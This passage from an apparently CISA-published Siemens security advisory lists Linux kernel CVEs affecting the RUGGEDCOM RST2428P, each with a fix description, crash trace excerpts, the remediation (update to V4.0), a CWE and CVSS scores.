[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 [ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2)) [ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0 Code starting with the faulting instruction =========================================== 0: 0f 84 4d 01 00 00 je 0x153 6: 48 89 70 18 mov %rsi,0x18(%rax) a: 8b 4b 10 mov 0x10(%rbx),%ecx d: 48 c7 c2 ff ff ff ff mov $0xffffffffffffffff,%rdx 14: 48 8b 78 08 mov 0x8(%rax),%rdi 18: 48 d3 e2 shl %cl,%rdx 1b: 48 21 f2 and %rsi,%rdx 1e: 48 2b 13 sub (%rbx),%rdx 21: 48 8b 30 mov (%rax),%rsi 24: 48 d3 ea shr %cl,%rdx 27: 8b 4b 18 mov 0x18(%rbx),%ecx ... [ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246 [ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000 [ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000 [ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000 [ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880 [ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000 [ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0 [ 0.910247] PKRU: 55555554 [ 0.910391] Call Trace: [ 0.910527] [ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485) [ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036) [ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076) [ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447) [ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958) [ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861) [ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550) [ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) [ 0.912296] ? __alloc_skb (net/core/skbuff.c:706) [ 0.912484] netlink_sendmsg (net/netlink/af ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22976">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22977</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sock: fix hardened usercopy panic in sock_recv_errqueue skbuff_fclone_cache was created without defining a usercopy region, [1] unlike skbuff_head_cache which properly whitelists the cb[] field. [2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is enabled and the kernel attempts to copy sk_buff.cb data to userspace via sock_recv_errqueue() -&gt; put_cmsg(). The crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone() (from skbuff_fclone_cache) [1] 2. The skb is cloned via skb_clone() using the pre-allocated fclone [3] 3. The cloned skb is queued to sk_error_queue for timestamp reporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE) 5. sock_recv_errqueue() calls put_cmsg() to copy serr-&gt;ee from skb-&gt;cb [4] 6. __check_heap_object() fails because skbuff_fclone_cache has no usercopy whitelist [5] When cloned skbs allocated from skbuff_fclone_cache are used in the socket error queue, accessing the sock_exterr_skb structure in skb-&gt;cb via put_cmsg() triggers a usercopy hardening violation: [ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object 'skbuff_fclone_cache' (offset 296, size 16)! [ 5.382796] kernel BUG at mm/usercopy.c:102! [ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI [ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7 [ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80 [ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff &lt;0f&gt; 0b 490 [ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246 [ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74 [ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0 [ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74 [ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001 [ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00 [ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000 [ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0 [ 5.384903] PKRU: 55555554 [ 5.384903] Call Trace: [ 5.384903] [ 5.384903] __check_heap_object+0x9a/0xd0 [ 5.384903] __check_object_size+0x46c/0x690 [ 5.384903] put_cmsg+0x129/0x5e0 [ 5.384903] sock_recv_errqueue+0x22f/0x380 [ 5.384903] tls_sw_recvmsg+0x7ed/0x1960 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? schedule+0x6d/0x270 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? mutex_unlock+0x81/0xd0 [ 5.384903] ? __pfx_mutex_unlock+0x10/0x10 [ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10 [ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0 [ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 The crash offset 296 corresponds to skb2-&gt;cb within skbuff_fclones: - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 - offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 = 272 + 24 (inside sock_exterr_skb.ee) This patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure. [1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885 [2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104 [3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566 [4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491 [5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22977">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/489.html">CWE-489 Active Debug Code</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23025</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: prevent pcp corruption with SMP=n The kernel test robot has reported: BUG: spinlock trylock failure on UP on CPU#0, kcompactd0/28 lock: 0xffff888807e35ef0, .magic: dead4ead, .owner: kcompactd0/28, .owner_cpu: 0 CPU: 0 UID: 0 PID: 28 Comm: kcompactd0 Not tainted 6.18.0-rc5-00127-ga06157804399 #1 PREEMPT 8cc09ef94dcec767faa911515ce9e609c45db470 Call Trace: __dump_stack (lib/dump_stack.c:95) dump_stack_lvl (lib/dump_stack.c:123) dump_stack (lib/dump_stack.c:130) spin_dump (kernel/locking/spinlock_debug.c:71) do_raw_spin_trylock (kernel/locking/spinlock_debug.c:?) _raw_spin_trylock (include/linux/spinlock_api_smp.h:89 kernel/locking/spinlock.c:138) __free_frozen_pages (mm/page_alloc.c:2973) ___free_pages (mm/page_alloc.c:5295) __free_pages (mm/page_alloc.c:5334) tlb_remove_table_rcu (include/linux/mm.h:? include/linux/mm.h:3122 include/asm-generic/tlb.h:220 mm/mmu_gather.c:227 mm/mmu_gather.c:290) ? __cfi_tlb_remove_table_rcu (mm/mmu_gather.c:289) ? rcu_core (kernel/rcu/tree.c:?) rcu_core (include/linux/rcupdate.h:341 kernel/rcu/tree.c:2607 kernel/rcu/tree.c:2861) rcu_core_si (kernel/rcu/tree.c:2879) handle_softirqs (arch/x86/include/asm/jump_label.h:36 include/trace/events/irq.h:142 kernel/softirq.c:623) __irq_exit_rcu (arch/x86/include/asm/jump_label.h:36 kernel/softirq.c:725) irq_exit_rcu (kernel/softirq.c:741) sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1052) RIP: 0010:_raw_spin_unlock_irqrestore (arch/x86/include/asm/preempt.h:95 include/linux/spinlock_api_smp.h:152 kernel/locking/spinlock.c:194) free_pcppages_bulk (mm/page_alloc.c:1494) drain_pages_zone (include/linux/spinlock.h:391 mm/page_alloc.c:2632) __drain_all_pages (mm/page_alloc.c:2731) drain_all_pages (mm/page_alloc.c:2747) kcompactd (mm/compaction.c:3115) kthread (kernel/kthread.c:465) ? __cfi_kcompactd (mm/compaction.c:3166) ? __cfi_kthread (kernel/kthread.c:412) ret_from_fork (arch/x86/kernel/process.c:164) ? __cfi_kthread (kernel/kthread.c:412) ret_from_fork_asm (arch/x86/entry/entry_64.S:255) Matthew has analyzed the report and identified that in drain_page_zone() we are in a section protected by spin_lock(&amp;pcp-&gt;lock) and then get an interrupt that attempts spin_trylock() on the same lock. The code is designed to work this way without disabling IRQs and occasionally fail the trylock with a fallback. However, the SMP=n spinlock implementation assumes spin_trylock() will always succeed, and thus it's normally a no-op. Here the enabled lock debugging catches the problem, but otherwise it could cause a corruption of the pcp structure. The problem has been introduced by commit 574907741599 ("mm/page_alloc: leave IRQs enabled for per-cpu page allocations"). The pcp locking scheme recognizes the need for disabling IRQs to prevent nesting spin_trylock() sections on SMP=n, but the need to prevent the nesting in spin_lock() has not been recognized. Fix it by introducing local wrappers that change the spin_lock() to spin_lock_iqsave() with SMP=n and use them in all places that do spin_lock(&amp;pcp-&gt;lock). [vbabka@suse.cz: add pcp_ prefix to the spin_lock_irqsave wrappers, per Steven]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23025">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23026</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() Fix a memory leak in gpi_peripheral_config() where the original memory pointed to by gchan-&gt;config could be lost if krealloc() fails. The issue occurs when: 1. gchan-&gt;config points to previously allocated memory 2. krealloc() fails and returns NULL 3. The function directly assigns NULL to gchan-&gt;config, losing the reference to the original memory 4. The original memory becomes unreachable and cannot be freed Fix this by using a temporary variable to hold the krealloc() result and only updating gchan-&gt;config when the allocation succeeds. Found via static analysis and code review.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23026">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23030</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: phy: rockchip: inno-usb2: Fix a double free bug in rockchip_usb2phy_probe() The for_each_available_child_of_node() calls of_node_put() to release child_np in each success loop. After breaking from the loop with the child_np has been released, the code will jump to the put_child label and will call the of_node_put() again if the devm_request_threaded_irq() fails. These cause a double free bug. Fix by returning directly to avoid the duplicate of_node_put().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23030">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23031</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_receive_bulk_callback(): fix URB memory leak In gs_can_open(), the URBs for USB-in transfers are allocated, added to the parent-&gt;rx_submitted anchor and submitted. In the complete callback gs_usb_receive_bulk_callback(), the URB is processed and resubmitted. In gs_can_close() the URBs are freed by calling usb_kill_anchored_urbs(parent-&gt;rx_submitted). However, this does not take into account that the USB framework unanchors the URB before the complete function is called. This means that once an in-URB has been completed, it is no longer anchored and is ultimately not released in gs_can_close(). Fix the memory leak by anchoring the URB in the gs_usb_receive_bulk_callback() to the parent-&gt;rx_submitted anchor.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23031">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23032</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: null_blk: fix kmemleak by releasing references to fault configfs items When CONFIG_BLK_DEV_NULL_BLK_FAULT_INJECTION is enabled, the null-blk driver sets up fault injection support by creating the timeout_inject, requeue_inject, and init_hctx_fault_inject configfs items as children of the top-level nullbX configfs group. However, when the nullbX device is removed, the references taken to these fault-config configfs items are not released. As a result, kmemleak reports a memory leak, for example: unreferenced object 0xc00000021ff25c40 (size 32): comm "mkdir", pid 10665, jiffies 4322121578 hex dump (first 32 bytes): 69 6e 69 74 5f 68 63 74 78 5f 66 61 75 6c 74 5f init_hctx_fault_ 69 6e 6a 65 63 74 00 88 00 00 00 00 00 00 00 00 inject.......... backtrace (crc 1a018c86): __kmalloc_node_track_caller_noprof+0x494/0xbd8 kvasprintf+0x74/0xf4 config_item_set_name+0xf0/0x104 config_group_init_type_name+0x48/0xfc fault_config_init+0x48/0xf0 0xc0080000180559e4 configfs_mkdir+0x304/0x814 vfs_mkdir+0x49c/0x604 do_mkdirat+0x314/0x3d0 sys_mkdir+0xa0/0xd8 system_call_exception+0x1b0/0x4f0 system_call_vectored_common+0x15c/0x2ec Fix this by explicitly releasing the references to the fault-config configfs items when dropping the reference to the top-level nullbX configfs group.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23032">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23033</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: omap-dma: fix dma_pool resource leak in error paths The dma_pool created by dma_pool_create() is not destroyed when dma_async_device_register() or of_dma_controller_register() fails, causing a resource leak in the probe error paths. Add dma_pool_destroy() in both error paths to properly release the allocated dma_pool resource.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23033">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23037</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: can: etas_es58x: allow partial RX URB allocation to succeed When es58x_alloc_rx_urbs() fails to allocate the requested number of URBs but succeeds in allocating some, it returns an error code. This causes es58x_open() to return early, skipping the cleanup label 'free_urbs', which leads to the anchored URBs being leaked. As pointed out by maintainer Vincent Mailhol, the driver is designed to handle partial URB allocation gracefully. Therefore, partial allocation should not be treated as a fatal error. Modify es58x_alloc_rx_urbs() to return 0 if at least one URB has been allocated, restoring the intended behavior and preventing the leak in es58x_open().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23037">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23038</a></h3>
<div class="csaf-accordion-content">
